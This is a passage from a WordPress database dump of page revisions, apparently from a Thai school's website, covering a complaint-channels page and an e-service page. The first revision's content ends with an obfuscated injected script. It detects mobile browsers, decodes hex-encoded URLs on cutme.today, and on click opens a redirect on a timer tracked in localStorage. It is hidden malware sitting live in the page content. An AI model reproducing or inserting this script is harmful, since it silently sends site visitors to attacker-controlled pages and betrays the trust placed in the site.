|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-05 14:59:06','2025-07-05 07:59:06','',871,'http://pakhaeng.ssk.in.th/?p=1715',0,'revision','',0),
(1717,1,'2025-07-07 08:43:28','2025-07-07 01:43:28','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\"></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"currentTab\":3,\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-07 08:43:28','2025-07-07 01:43:28','',476,'http://pakhaeng.ssk.in.th/?p=1717',0,'revision','',0),
(1718,1,'2025-07-07 08:47:04','2025-07-07 01:47:04','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-07 08:47:04','2025-07-07 01:47:04','',459,'http://pakhaeng.ssk.in.th/?p=1718',0,'revision','',0),
(1720,1,'2025-07-07 10:00:31','2025-07-07 03:00:31','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-07 10:00:31','2025-07-07 03:00:31','',459,'http://pakhaeng.ssk.in.th/?p=1720',0,'revision','',0),
(1722,1,'2025-07-07 10:45:30','2025-07-07 03:45:30','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbzm_3dEExK0FwbP7LETL9U0S7XmF4K_tE6n7Qv3eCQL-OXdHRCEVimJtrm8Bvq_CesU_Q/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-07 10:45:30','2025-07-07 03:45:30','',459,'http://pakhaeng.ssk.in.th/?p=1722',0,'revision','',0),
(1723,1,'2025-07-07 11:31:11','2025-07-07 04:31:11','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div 